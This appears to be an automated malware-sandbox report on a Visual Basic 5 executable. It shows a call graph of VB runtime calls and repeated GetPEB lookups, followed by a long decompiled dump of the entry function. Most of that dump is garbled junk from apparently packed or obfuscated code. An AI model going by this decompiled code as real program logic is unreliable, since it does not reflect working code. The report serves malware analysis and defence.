__vbaHresultCheckObj 3239->3240 3241 40b9b2 3239->3241 3240->3241 3242 40c0cb __vbaFreeVar __vbaFreeObj 3241->3242 3243 40ba18 __vbaObjSet 3241->3243 3244 40b9fd __vbaNew2 3241->3244 3247 40ba63 3243->3247 3244->3243 3248 40ba74 __vbaHresultCheckObj 3247->3248 3249 40ba97 3247->3249 3248->3249 3250 40bac2 __vbaObjSet 3249->3250 3251 40baa7 __vbaNew2 3249->3251 3253 40bb10 3250->3253 3251->3250 3254 40bb21 __vbaHresultCheckObj 3253->3254 3255 40bb44 3253->3255 3254->3255 3256 40bbce 3255->3256 3257 40bbae __vbaHresultCheckObj 3255->3257 3258 40bbd5 __vbaFreeObjList __vbaFreeVar 3256->3258 3257->3258 3259 40bc01 __vbaNew2 3258->3259 3260 40bc1c __vbaObjSet 3258->3260 3259->3260 3262 40bc67 3260->3262 3263 40bc98 3262->3263 3264 40bc78 __vbaHresultCheckObj 3262->3264 3265 40bcc3 __vbaObjSet 3263->3265 3266 40bca8 __vbaNew2 3263->3266 3264->3263 3268 40bd11 3265->3268 3266->3265 3269 40bd22 __vbaHresultCheckObj 3268->3269 3270 40bd45 3268->3270 3269->3270 3271 40bda7 3270->3271 3272 40bd87 __vbaHresultCheckObj 3270->3272 3273 40bdae __vbaFreeObjList 3271->3273 3272->3273 3274 40bde4 __vbaObjSet 3273->3274 3275 40bdc9 __vbaNew2 3273->3275 3277 40be32 3274->3277 3275->3274 3278 40be43 __vbaHresultCheckObj 3277->3278 3279 40be66 3277->3279 3278->3279 3280 40be91 __vbaObjSet 3279->3280 3281 40be76 __vbaNew2 3279->3281 3283 40bedf 3280->3283 3281->3280 3284 40bef0 __vbaHresultCheckObj 3283->3284 3285 40bf13 3283->3285 3284->3285 3286 40bf23 __vbaNew2 3285->3286 3287 40bf3e __vbaObjSet 3285->3287 3286->3287 3289 40bf89 3287->3289 3290 40bf9a __vbaHresultCheckObj 3289->3290 3291 40bfbd 3289->3291 3292 40bfc4 __vbaChkstk 3290->3292 3291->3292 3293 40c069 3292->3293 3294 40c098 3293->3294 3295 40c078 __vbaHresultCheckObj 3293->3295 3296 40c09f __vbaFreeObjList __vbaFreeVar 3294->3296 3295->3296 3296->3242 3316 20f2e09 3317 20f2ddb 3316->3317 3320 20f2a75 3317->3320 3324 20f4def GetPEB 3317->3324 3319 20f4adf 3319->3320 3321 20f4def GetPEB 3319->3321 3322 20f4af6 3321->3322 3322->3320 3323 20f4def GetPEB 3322->3323 3323->3320 3325 20f4e1f 3324->3325 3325->3319 3379 20f1c87 3381 20f1ca5 3379->3381 3380 20f050b 3381->3380 3382 20f1d26 GetPEB 3381->3382 3383 20f1d7a 3382->3383 3384 20f4def GetPEB 3383->3384 3386 20f1c72 3383->3386 3385 20f4adf 3384->3385 3385->3386 3387 20f4def GetPEB 3385->3387 3388 20f4af6 3387->3388 3388->3386 3389 20f4def GetPEB 3388->3389 3389->3386 3455 40c14b __vbaChkstk 3456 40c18d 3455->3456 3457 40c196 __vbaNew2 3456->3457 3458 40c1ae __vbaObjSet 3456->3458 3457->3458 3460 40c1e7 3458->3460 3461 40c1f2 __vbaHresultCheckObj 3460->3461 3462 40c20c 3460->3462 3463 40c210 #561 __vbaFreeObj __vbaFreeVar 3461->3463 3462->3463 3464 40c251 3463->3464 3465 40c4cd 3463->3465 3466 40c272 __vbaObjSet 3464->3466 3467 40c25a __vbaNew2 3464->3467 3469 40c2ab 3466->3469 3467->3466 3470 40c2d0 3469->3470 3471 40c2b6 __vbaHresultCheckObj 3469->3471 3472 40c2f8 __vbaObjSet 3470->3472 3473 40c2dd __vbaNew2 3470->3473 3471->3470 3475 40c33a 3472->3475 3473->3472 3476 40c362 3475->3476 3477 40c345 __vbaHresultCheckObj 3475->3477 3478 40c369 __vbaLateIdCallLd 3476->3478 3477->3478 3479 40c3a0 __vbaObjSet 3478->3479 3480 40c385 __vbaNew2 3478->3480 3482 40c3df 3479->3482 3480->3479 3483 40c404 3482->3483 3484 40c3ea __vbaHresultCheckObj 3482->3484 3485 40c40b __vbaFpI4 __vbaI4Var 3483->3485 3484->3485 3486 40c47c 3485->3486 3487 40c4a4 3486->3487 3488 40c487 __vbaHresultCheckObj 3486->3488 3489 40c4ab __vbaFreeObjList __vbaFreeVar 3487->3489 3488->3489 3489->3465 3390 20f049f 3393 20f4a24 3390->3393 3392 20f04b2 3394 20f4a59 3393->3394 3395 20f4def GetPEB 3394->3395 3397 20f2a75 3394->3397 3396 20f4adf 3395->3396 3396->3397 3398 20f4def GetPEB 3396->3398 3397->3392 3399 20f4af6 3398->3399 3399->3397 3400 20f4def GetPEB 3399->3400 3400->3397 3500 20f1d5e 3501 20f1d97 3500->3501 3502 20f4def GetPEB 3501->3502 3504 20f1c72 3501->3504 3503 20f4adf 3502->3503 3503->3504 3505 20f4def GetPEB 3503->3505 3506 20f4af6 3505->3506 3506->3504 3507 20f4def GetPEB 3506->3507 3507->3504 3508 40cd14 __vbaChkstk 3509 40cd62 3508->3509 3510 40cd4a __vbaNew2 3508->3510 3511 40cd8b __vbaHresultCheckObj 3509->3511 3512 40cda2 3509->3512 3510->3509 3511->3512 3513 40cdc6 __vbaHresultCheckObj 3512->3513 3514 40cddd 3512->3514 3515 40cde1 __vbaStrMove __vbaFreeObj 3513->3515 3514->3515 3516 40ce16 __vbaFreeStr 3515->3516 3538 20f2d99 3539 20f2dc4 3538->3539 3541 20f2ddb 3539->3541 3548 20f1e8f 3539->3548 3542 20f2a75 3541->3542 3543 20f4def GetPEB 3541->3543 3544 20f4adf 3543->3544 3544->3542 3545 20f4def GetPEB 3544->3545 3546 20f4af6 3545->3546 3546->3542 3547 20f4def GetPEB 3546->3547 3547->3542 3549 20f1ead 3548->3549 3550 20f4def GetPEB 3549->3550 3552 20f1ec7 3549->3552 3551 20f4adf 3550->3551 3551->3552 3553 20f4def GetPEB 3551->3553 3552->3541 3554 20f4af6 3553->3554 3554->3552 3555 20f4def GetPEB 3554->3555 3555->3552 3326 20f2a58 GetPEB 3517 40c518 __vbaChkstk 3518 40c558 #572 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 3517->3518 3519 40c64b __vbaFreeObj 3518->3519 3520 40c5ac 3518->3520 3521 40c5b5 __vbaNew2 3520->3521 3522 40c5cd 3520->3522 3524 40c5d4 __vbaChkstk 3521->3524 3522->3524 3525 40c60f 3524->3525 3526 40c631 3525->3526 3527 40c61a __vbaHresultCheckObj 3525->3527 3528 40c635 __vbaObjSet 3526->3528 3527->3528 3528->3519 3401 40c8d9 8 API calls 3402 40cae9 __vbaFreeStr __vbaFreeVar 3401->3402 3403 40c9bf 3401->3403 3405 40c9e3 3403->3405 3406 40c9c8 __vbaNew2 3403->3406 3407 40ca41 3405->3407 3408 40ca21 __vbaHresultCheckObj 3405->3408 3406->3405 3409 40ca48 __vbaChkstk 3407->3409 3408->3409 3410 40ca8e 3409->3410 3411 40cabf 3410->3411 3412 40ca9f __vbaHresultCheckObj 3410->3412 3413 40cac6 __vbaStrMove __vbaFreeObj 3411->3413 3412->3413 3413->3402 3556 20f2d96 3557 20f2dc4 3556->3557 3558 20f1e8f GetPEB 3557->3558 3559 20f2ddb 3557->3559 3558->3559 3560 20f4def GetPEB 3559->3560 3562 20f2a75 3559->3562 3561 20f4adf 3560->3561 3561->3562 3563 20f4def GetPEB 3561->3563 3564 20f4af6 3563->3564 3564->3562 3565 20f4def GetPEB 3564->3565 3565->3562 3422 40c69d __vbaChkstk 3423 40c6df #647 3422->3423 3424 40c703 __vbaNew2 3423->3424 3425 40c71e __vbaObjSet 3423->3425 3424->3425 3427 40c75d 3425->3427 3428 40c782 3427->3428 3429 40c768 __vbaHresultCheckObj 3427->3429 3430 40c789 __vbaVarTstEq __vbaFreeObj __vbaFreeVarList 3428->3430 3429->3430 3431 40c7e1 3430->3431 3432 40c875 __vbaFreeStr 3430->3432 3434 40c7ea __vbaNew2 3431->3434 3435 40c805 3431->3435 3434->3435 3436 40c853 3435->3436 3437 40c839 __vbaHresultCheckObj 3435->3437 3438 40c85a __vbaStrMove 3436->3438 3437->3438 3438->3432 3490 40cb62 __vbaChkstk 3491 40cba2 __vbaVarDup #607 __vbaVarTstNe __vbaFreeVarList 3490->3491 3492 40ccbe __vbaFreeVar 3491->3492 3493 40cc07 3491->3493 3494 40cc26 3493->3494 3495 40cc2e _adj_fdiv_m64 3493->3495 3497 40cc3f __vbaFpI4 3494->3497 3495->3497 3498 40cc96 3497->3498 3498->3492 3499 40cca1 __vbaHresultCheckObj 3498->3499 3499->3492 3439 20f1ceb 3440 20f050b 3439->3440 3441 20f1d0b GetPEB 3439->3441 3443 20f1d7a 3441->3443 3444 20f1c72 3443->3444 3445 20f4def GetPEB 3443->3445 3446 20f4adf 3445->3446 3446->3444 3447 20f4def GetPEB 3446->3447 3448 20f4af6 3447->3448 3448->3444 3449 20f4def GetPEB 3448->3449 3449->3444 3343 401226 __vbaExceptHandler 3414 20f4aa3 3415 20f4acf 3414->3415 3416 20f4def GetPEB 3415->3416 3417 20f4adf 3416->3417 3418 20f4def GetPEB 3417->3418 3421 20f4b10 3417->3421 3419 20f4af6 3418->3419 3420 20f4def GetPEB 3419->3420 3419->3421 3420->3421 3450 20f38e2 3451 20f4a24 GetPEB 3450->3451 3452 20f3900 3451->3452 3453 20f4a24 GetPEB 3452->3453 3454 20f3930 3453->3454 3115 4013b0 #100 3116 4013f1 3115->3116 3344 40d039 __vbaChkstk 3345 40d079 #527 __vbaStrMove __vbaStrCmp __vbaFreeStr 3344->3345 3346 40d2a1 __vbaFreeStr 3345->3346 3347 40d0b8 3345->3347 3348 40d0c1 __vbaNew2 3347->3348 3349 40d0d9 __vbaObjSet 3347->3349 3348->3349 3352 40d112 3349->3352 3353 40d137 3352->3353 3354 40d11d __vbaHresultCheckObj 3352->3354 3355 40d144 __vbaNew2 3353->3355 3356 40d15c __vbaObjSet 3353->3356 3354->3353 3355->3356 3358 40d195 3356->3358 3359 40d1a0 __vbaHresultCheckObj 3358->3359 3360 40d1ba 3358->3360 3359->3360 3361 40d1c7 __vbaNew2 3360->3361 3362 40d1df 3360->3362 3361->3362 3363 40d208 __vbaHresultCheckObj 3362->3363 3364 40d21f 3362->3364 3363->3364 3365 40d260 3364->3365 3366 40d249 __vbaHresultCheckObj 3364->3366 3367 40d264 __vbaStrMove __vbaFreeStrList __vbaFreeObjList 3365->3367 3366->3367 3367->3346

        Executed Functions

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 234 4013b0-4013ef #100 235 4013f1 234->235 236 401456-40146b 234->236 235->236 239 4013f5-401404 235->239 237 4014d2-4014d7 236->237 238 40146d-401474 236->238 240 401542-401551 237->240 241 4014d9-4014de 237->241 242 401476 238->242 243 4014df-4014ea 238->243 246 401553 240->246 247 4015c7-4015ec 240->247 241->243 242->241 245 401478-401486 242->245 244 4014eb-4014f0 243->244 248 4014f1-4014f2 244->248 245->248 250 401488 245->250 251 4015c4-4015c5 246->251 252 401555-401559 246->252 249 4015ee-4015f3 247->249 254 4014f4 248->254 255 4014f5-401502 248->255 250->244 256 40148a-4014ac 250->256 251->247 257 40155c-40156b 252->257 254->255 258 401504-401516 255->258 259 40156d-401584 255->259 260 401517-401522 256->260 261 4014ae-4014b8 256->261 257->259 258->260 259->249 262 401586-4015a0 259->262 263 401526-401529 260->263 261->263 264 4014ba-4014d1 261->264 265 4015a2-4015a4 262->265 266 4015a6-4015c3 262->266 263->257 267 40152b-40152e 263->267 264->237 265->266 266->251 269 40153f 267->269 270 40152f-40153d 267->270 269->240 270->269
        C-Code - Quality: 73%
        			_entry_(signed int __eax, signed int __ebx, signed int __ecx, intOrPtr* __edx, void* __edi, signed int __esi, char _a1, intOrPtr _a3, intOrPtr* _a4, signed int _a7, signed int _a19, char _a64, char _a110, char _a65600, char _a131136, char _a196672, char _a4194368, intOrPtr _a1157627905) {
        				intOrPtr* _v0;
        				intOrPtr _v1;
        				signed int _v28;
        				char _v32;
        				char _v36;
        				char _v40;
        				char _v44;
        				signed int _v52;
        				void* _v56;
        				char _v60;
        				char _v68;
        				char _v69;
        				intOrPtr _v72;
        				intOrPtr _v76;
        				signed int _v80;
        				char _v84;
        				void* _v88;
        				signed int _v92;
        				signed int _v96;
        				signed int _v100;
        				intOrPtr* _v104;
        				signed int _v108;
        				signed int _v112;
        				intOrPtr _v120;
        				char* _v121;
        				intOrPtr* _v124;
        				signed int _v128;
        				signed int _v129;
        				intOrPtr* _v132;
        				signed int _v136;
        				intOrPtr* _v140;
        				signed int _v144;
        				intOrPtr* _v148;
        				signed int _v152;
        				char* _v153;
        				intOrPtr _v156;
        				intOrPtr _v160;
        				signed int _v161;
        				intOrPtr _v164;
        				intOrPtr _v168;
        				signed int _v172;
        				void* _v176;
        				char _v196;
        				char _v200;
        				char _v204;
        				char _v208;
        				char _v212;
        				intOrPtr _v216;
        				char _v220;
        				intOrPtr _v224;
        				signed int _v225;
        				char _v228;
        				intOrPtr _v232;
        				char _v236;
        				signed int _v240;
        				signed int _v244;
        				signed int _v248;
        				signed int _v252;
        				signed int _v256;
        				signed int _v260;
        				signed int _v264;
        				intOrPtr _v268;
        				intOrPtr _v272;
        				signed int _v284;
        				signed int _v288;
        				signed int _v292;
        				signed int _v296;
        				signed int _v300;
        				signed int _v304;
        				signed int _v308;
        				intOrPtr* _v312;
        				signed int _v316;
        				intOrPtr* _v320;
        				signed int _v324;
        				signed int _v328;
        				intOrPtr* _v332;
        				signed int _v336;
        				signed int _v340;
        				intOrPtr* _v344;
        				signed int _v348;
        				signed int _v352;
        				signed int _v356;
        				intOrPtr* _v360;
        				signed int _v364;
        				intOrPtr* _v368;
        				signed int _v372;
        				intOrPtr* _v376;
        				signed int _v380;
        				intOrPtr* _v384;
        				signed int _v388;
        				signed int _v392;
        				intOrPtr* _v396;
        				signed int _v400;
        				intOrPtr* _v404;
        				signed int _v408;
        				intOrPtr* _v412;
        				signed int _v416;
        				intOrPtr* _v420;
        				signed int _v424;
        				intOrPtr* _v428;
        				signed int _v432;
        				signed int _v436;
        				intOrPtr* _v440;
        				signed int _v444;
        				intOrPtr* _v448;
        				signed int _v452;
        				signed int _v456;
        				signed int _v460;
        				intOrPtr* _v464;
        				signed int _v468;
        				intOrPtr* _v472;
        				signed int _v476;
        				signed int _v480;
        				intOrPtr* _v484;
        				signed int _v488;
        				intOrPtr* _v492;
        				signed int _v496;
        				signed int _v500;
        				intOrPtr* _v504;
        				signed int _v508;
        				intOrPtr* _v512;
        				signed int _v516;
        				intOrPtr* _v520;
        				signed int _v524;
        				signed int _v528;
        				intOrPtr* _v781;
        				intOrPtr _v793;
        				intOrPtr _v797;
        				intOrPtr _v801;
        				signed int _v65472;
        				intOrPtr _v535035840;
        				intOrPtr _v1308606428;
        				intOrPtr* _t1101;
        				signed char _t1102;
        				signed int _t1103;
        				intOrPtr* _t1104;
        				signed char _t1107;
        				intOrPtr* _t1108;
        				intOrPtr* _t1109;
        				intOrPtr* _t1121;
        				intOrPtr* _t1122;
        				signed int _t1123;
        				signed int _t1124;
        				signed int _t1125;
        				signed int _t1127;
        				signed char _t1128;
        				intOrPtr* _t1130;
        				signed int _t1136;
        				signed int _t1137;
        				intOrPtr* _t1139;
        				intOrPtr* _t1140;
        				intOrPtr* _t1141;
        				char* _t1143;
        				intOrPtr* _t1144;
        				intOrPtr* _t1147;
        				intOrPtr* _t1148;
        				signed int _t1149;
        				signed int _t1150;
        				intOrPtr* _t1152;
        				signed int _t1164;
        				signed int _t1165;
        				intOrPtr* _t1166;
        				intOrPtr* _t1167;
        				intOrPtr* _t1168;
        				void* _t1169;
        				intOrPtr* _t1170;
        				intOrPtr* _t1171;
        				signed char _t1173;
        				signed char _t1175;
        				intOrPtr* _t1176;
        				intOrPtr* _t1177;
        				signed char* _t1178;
        				signed char _t1179;
        				intOrPtr* _t1181;
        				intOrPtr* _t1182;
        				intOrPtr* _t1183;
        				signed int _t1184;
        				signed int _t1186;
        				intOrPtr* _t1188;
        				signed int _t1189;
        				intOrPtr* _t1191;
        				intOrPtr* _t1193;
        				signed int _t1195;
        				signed int _t1196;
        				signed int _t1197;
        				signed char _t1198;
        				void* _t1200;
        				intOrPtr* _t1201;
        				signed int _t1202;
        				signed char _t1204;
        				signed char _t1205;
        				intOrPtr* _t1206;
        				intOrPtr* _t1208;
        				intOrPtr* _t1210;
        				intOrPtr* _t1212;
        				intOrPtr* _t1215;
        				intOrPtr* _t1220;
        				signed int _t1221;
        				intOrPtr* _t1222;
        				intOrPtr* _t1224;
        				signed int _t1226;
        				signed int _t1227;
        				intOrPtr* _t1229;
        				signed int _t1236;
        				intOrPtr* _t1240;
        				signed int _t1241;
        				signed int _t1242;
        				intOrPtr* _t1243;
        				void* _t1245;
        				signed char _t1246;
        				signed int _t1249;
        				signed char _t1253;
        				signed char _t1254;
        				intOrPtr* _t1256;
        				intOrPtr* _t1257;
        				intOrPtr* _t1258;
        				intOrPtr* _t1259;
        				intOrPtr* _t1260;
        				signed int* _t1261;
        				signed int* _t1262;
        				signed int* _t1263;
        				signed int _t1276;
        				signed int* _t1279;
        				signed int _t1285;
        				signed int _t1289;
        				signed int* _t1293;
        				signed int _t1294;
        				signed int _t1299;
        				signed int _t1303;
        				signed int _t1308;
        				signed int _t1312;
        				signed int _t1316;
        				signed int _t1327;
        				signed int _t1334;
        				signed int _t1339;
        				signed int _t1343;
        				signed int _t1355;
        				signed int _t1359;
        				signed int _t1363;
        				signed int _t1367;
        				signed int _t1371;
        				signed int _t1375;
        				signed int _t1385;
        				signed int _t1393;
        				signed int _t1397;
        				signed int _t1401;
        				signed int _t1405;
        				signed int _t1409;
        				signed int _t1413;
        				signed int _t1433;
        				signed int _t1437;
        				signed int _t1441;
        				signed int _t1445;
        				signed int _t1449;
        				signed int _t1455;
        				signed int _t1459;
        				signed int _t1463;
        				signed int _t1467;
        				signed int _t1475;
        				signed int _t1480;
        				void* _t1482;
        				signed int _t1486;
        				signed int _t1490;
        				signed int _t1494;
        				signed int _t1498;
        				signed int _t1506;
        				signed int _t1512;
        				signed int _t1516;
        				signed int _t1520;
        				signed int _t1524;
        				signed int _t1528;
        				signed int _t1534;
        				signed int _t1538;
        				signed int _t1542;
        				signed int _t1546;
        				signed int _t1550;
        				signed int _t1554;
        				signed int _t1564;
        				signed int _t1570;
        				char* _t1579;
        				signed int _t1583;
        				char* _t1585;
        				char* _t1586;
        				char* _t1590;
        				signed int _t1594;
        				signed int _t1598;
        				signed int _t1602;
        				char* _t1607;
        				signed int _t1611;
        				char* _t1612;
        				signed int _t1615;
        				signed int _t1624;
        				signed int _t1628;
        				signed int _t1629;
        				intOrPtr* _t1630;
        				signed int _t1631;
        				intOrPtr* _t1632;
        				signed int _t1635;
        				void* _t1636;
        				intOrPtr* _t1637;
        				signed int _t1638;
        				void* _t1640;
        				signed int _t1641;
        				signed int _t1643;
        				signed char _t1644;
        				signed int _t1646;
        				void* _t1651;
        				void* _t1652;
        				void* _t1658;
        				intOrPtr* _t1659;
        				intOrPtr* _t1660;
        				void* _t1661;
        				signed char _t1664;
        				intOrPtr* _t1667;
        				intOrPtr _t1682;
        				intOrPtr _t1686;
        				intOrPtr _t1697;
        				intOrPtr _t1707;
        				intOrPtr _t1720;
        				intOrPtr _t1731;
        				intOrPtr _t1747;
        				intOrPtr _t1765;
        				intOrPtr* _t1769;
        				intOrPtr* _t1773;
        				void* _t1774;
        				intOrPtr* _t1777;
        				intOrPtr* _t1778;
        				long long* _t1786;
        				signed int* _t1796;
        				signed int _t1801;
        				void* _t1802;
        				void* _t1805;
        				void* _t1806;
        				intOrPtr* _t1810;
        				void* _t1811;
        				intOrPtr _t1812;
        				void* _t1813;
        				intOrPtr* _t1814;
        				long long* _t1815;
        				long long* _t1816;
        				void* _t1817;
        				long long* _t1818;
        				intOrPtr* _t1819;
        				void* _t1820;
        				long long* _t1821;
        				intOrPtr _t1822;
        				intOrPtr* _t1823;
        				intOrPtr _t1833;
        				intOrPtr _t1834;
        				intOrPtr _t1841;
        				intOrPtr _t1847;
        				intOrPtr _t1965;
        				intOrPtr _t1966;
        				intOrPtr _t1967;
        
        				_t1788 = __esi;
        				_t1769 = __edx;
        				_t1650 = __ebx;
        				_push("VB5!6&*"); // executed
        				L004013A8(); // executed
        				 *__eax =  *__eax + __eax;
        				 *__eax =  *__eax + __eax;
        				 *__eax =  *__eax + __eax;
        				 *__eax =  *__eax ^ __eax;
        				 *__eax =  *__eax + __eax;
        				_t1101 = __eax + 1;
        				 *_t1101 =  *_t1101 + _t1101;
        				 *_t1101 =  *_t1101 + _t1101;
        				 *_t1101 =  *_t1101 + _t1101;
        				 *((intOrPtr*)(__edi + 0x54)) =  *((intOrPtr*)(__edi + 0x54)) + _t1101;
        				_t1777 = __edi + 1;
        				_push(_t1805);
        				_t1806 = _t1805 - 1;
        				_t1664 = __ecx ^  *(__edx - 0x61);
        				 *_t1664 =  *_t1664 ^ 0x00000078;
        				asm("adc bh, [ebp+0x7f95d3]");
        				 *_t1101 =  *_t1101 + _t1101;
        				 *_t1101 =  *_t1101 + _t1101;
        				 *_t1664 =  *_t1664 + _t1101;
        				 *_t1101 =  *_t1101 + _t1101;
        				 *_t1101 =  *_t1101 + _t1101;
        				_t1102 = _t1101 + _t1101;
        				asm("fild word [esi]");
        				asm("outsb");
        				if( &_a1 +  *((intOrPtr*)(__esi + 0x6f)) > 0) {
        					asm("a16 jz 0x65");
        					asm("bound eax, [eax]");
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1664 =  *_t1664 | _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					_t1806 = _t1806 - 1;
        					 *_t1102 =  *_t1102 ^ _t1102;
        					_pop(es);
        					goto 0xfb4d7389;
        					_push(0xd9d4625);
        					asm("sbb eax, 0xcab8da9e");
        					asm("invalid");
        					asm("adc [ecx+0x288e47ea], bh");
        					asm("jecxz 0xffffffc0");
        					asm("scasb");
        					_t1788 = cs;
        					_t1650 = __ebx ^  *(_t1664 - 0x48ee309a);
        					asm("cdq");
        					asm("iretw");
        					asm("adc [edi+0xaa000c], esi");
        					asm("pushad");
        					asm("rcl dword [ebx], cl");
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        					 *_t1102 =  *_t1102 + _t1102;
        				}
        				 *_t1102 =  *_t1102 + _t1102;
        				_a1157627905 = _a1157627905 + _t1102;
        				 *_t1102 =  *_t1102 + _t1102;
        				 *_t1102 =  *_t1102 + _t1102;
        				 *_t1102 =  *_t1102 | _t1102;
        				_t1801 =  *(_t1788 + 0x64) * 0x69726b73;
        				if(_t1801 <= 0) {
        					L12:
        					_t1102 = _t1102 +  *_t1777;
        					_t25 = _t1777 + 0x70;
        					 *_t25 =  *((intOrPtr*)(_t1777 + 0x70)) + _t1664;
        					if( *_t25 == 0) {
        						_t1651 = _t1650 + 1;
        						asm("outsd");
        						asm("insd");
        						asm("insd");
        						asm("popad");
        						asm("outsb");
        						 *[fs:eax] =  *[fs:eax] ^ _t1102;
        						_t1103 = _t1102 + 1;
        						_pop(es);
        						_t34 = _t1788 + 0x69;
        						 *_t34 =  *((intOrPtr*)(_t1788 + 0x69)) + _t1769;
        						_t1847 =  *_t34;
        						if(_t1847 < 0) {
        							goto L36;
        						} else {
        							if(_t1847 != 0) {
        								goto L35;
        							} else {
        								if (_t1847 >= 0) goto L28;
        								_t1640 = _t1103 + 0x5371090;
        								asm("aaa");
        								_t1641 = _t1640 + 0x1110267;
        								_t1650 = _t1651 + _t1651;
        								 *_t1641 =  *_t1641 + _t1641;
        								 *_t1788 =  *_t1788 + _t1641;
        								_push(es);
        								 *((intOrPtr*)(_t1650 + 0x6f)) =  *((intOrPtr*)(_t1650 + 0x6f)) + _t1641;
        								goto L30;
        							}
        						}
        					} else {
        						goto L13;
        					}
        				} else {
        					 *0x4b000701 =  *0x4b000701 + _t1664;
        					_t1833 =  *0x4b000701;
        					asm("popad");
        					if(_t1833 < 0) {
        						L14:
        						 *_t1102 =  *_t1102 | _t1102;
        						_push(_t1801);
        						_push(_t1650);
        						_t1801 =  &_a1;
        						_t1806 = _t1806 - 1;
        						_t1664 = _t1664 + 1 - 1;
        						_t1777 = _t1777 + 2;
        						 *0x177003c0 =  *0x177003c0 + _t1102;
        						_t1841 =  *0x177003c0;
        						goto L15;
        					} else {
        						if(_t1833 == 0) {
        							L13:
        							asm("outsd");
        							asm("outsb");
        							_t1102 = _t1102 ^  *_t1102;
        							_push(es);
        							 *_t1664 =  *_t1664 + _t1664;
        							goto L14;
        						} else {
        							asm("insb");
        							 *_t1664 =  *_t1664 + _t1650;
        							 *_t1102 =  *_t1102 + _t1102;
        							_t1769 = _t1769 + 1;
        							 *_t1769 =  *_t1769 + _t1102;
        							 *((intOrPtr*)(_t1777 + _t1102)) =  *((intOrPtr*)(_t1777 + _t1102)) + _t1806;
        							_t12 = _t1650 + 0x61;
        							 *_t12 =  *(_t1650 + 0x61) + _t1664;
        							_t1834 =  *_t12;
        							if(_t1834 < 0) {
        								L16:
        								_push(es);
        								if(_t1841 <= 0) {
        									asm("adc al, [eax+eax]");
        								}
        								 *_t1650 =  *_t1650 + 1;
        								_t1641 = _t1102 & 0x03000000;
        								_pop(es);
        								_t27 = _t1777 + 0x70;
        								 *_t27 =  *((intOrPtr*)(_t1777 + 0x70)) + _t1664;
        								if( *_t27 == 0) {
        									L30:
        									asm("outsd");
        									asm("insd");
        									asm("bound ebp, [edi+0x31]");
        									 *_t1777 =  *_t1777 + _t1641;
        									asm("scasd");
        									_t1107 = _t1641 + 0xe8c0753;
        									_t38 =  &_a110;
        									 *_t38 = _a110 + _t1769;
        									asm("insb");
        									asm("popad");
        									if( *_t38 < 0) {
        										 *[gs:ebx] =  *[gs:ebx] + _t1769;
        										 *_t1107 =  *_t1107 + _t1107;
        										 *_t1650 =  *_t1650 + 1;
        										_t1777 = _t1777 - 1;
        										 *_t1107 =  *_t1107 + _t1107;
        										 *_t1777 =  *_t1777 + _t1107;
        										_t1643 = _t1107 + 0x74614400;
        										asm("popad");
        										 *_t1643 =  *_t1643 ^ _t1643;
        										_t1644 = _t1643 & 0x880d2002;
        										_push(cs);
        										if(_t1644 != 0) {
        											_t1644 = _t1644 - 1;
        											asm("adc cl, [eax+eax]");
        										}
        										 *_t1664 =  *_t1664 + _t1644;
        										asm("arpl [eax], ax");
        										asm("arpl [eax], ax");
        										 *[gs:ebx] =  *[gs:ebx] + _t1769;
        										if ( *[gs:ebx] >= 0) goto L34;
        										 *_t1644 =  *_t1644 & _t1644;
        										_t1103 = _t1644 ^  *_t1644;
        										 *_t1103 =  *_t1103 ^ _t1103;
        										 *_t1103 =  *_t1103 ^ _t1103;
        										 *_t1103 =  *_t1103 ^ _t1103;
        										asm("adc eax, [eax]");
        										 *_t1788 =  *_t1788 + _t1769;
        										 *_t1777 =  *_t1777 + _t1769;
        										L35:
        										_pop(ss);
        										 *_t1103 =  *_t1103 + _t1651;
        										L36:
        										 *_t1103 =  *_t1103 + _t1103;
        										asm("sbb [0x74614400], eax");
        										asm("popad");
        										 *_t1103 =  *_t1103 ^ _t1103;
        										asm("sbb eax, [eax]");
        										 *0x2d022c01 =  *0x2d022c01 + _t1103;
        										_t1650 = _t1651 + _t1651;
        										_t1104 = _t1103 +  *((intOrPtr*)(_t1103 + _t1103));
        										 *_t1788 =  *_t1788 + _t1104;
        										 *_t1104 =  *_t1104 + _t1104;
        										_t1107 = _t1104 + _t1664 - 0x00010040 |  *(_t1104 + _t1664 - 0x10040);
        										 *0x40 =  *0x40 | _t1107;
        									}
        								} else {
        									asm("outsd");
        									asm("outsb");
        									 *_t1641 =  *_t1641 ^ _t1641;
        									_push(es);
        									 *((intOrPtr*)(_t1641 + _t1641)) =  *((intOrPtr*)(_t1641 + _t1641)) + _t1641;
        									_push(_t1650);
        									_push(_t1806);
        									_t1664 = _t1664 - 1;
        									_t1806 = _t1806 - 1;
        									 *0x14a00348 =  *0x14a00348 + _t1641;
        									asm("scasd");
        									goto L20;
        								}
        							} else {
        								if(_t1834 == 0) {
        									L15:
        									_t1102 = _t1102 + 0x177003c0;
        									asm("lahf");
        									goto L16;
        								} else {
        									asm("insb");
        									 *0x1bd7 =  *0x1bd7 + _t1769;
        									asm("into");
        									 *_t1102 =  *_t1102 + _t1102;
        									_t1641 = _t1102 + 0x6000019;
        									asm("adc [eax], al");
        									 *((intOrPtr*)(_t1641 + _t1641 + 0x46)) =  *((intOrPtr*)(_t1641 + _t1641 + 0x46)) + _t1641;
        									_t1777 = _t1777 + _t1777;
        									 *_t1769 =  *_t1769 + _t1801;
        									 *_t1641 =  *_t1641 + _t1641;
        									 *_t1664 =  *_t1664 + _t1641;
        									es = cs;
        									_t18 = _t1777 + 0x70;
        									 *_t18 =  *((intOrPtr*)(_t1777 + 0x70)) + _t1664;
        									if( *_t18 == 0) {
        										L20:
        										_t1646 = _t1641 + 0x31201ef;
        										_t1650 = _t1650 + _t1650 +  *((intOrPtr*)(_t1650 + _t1650));
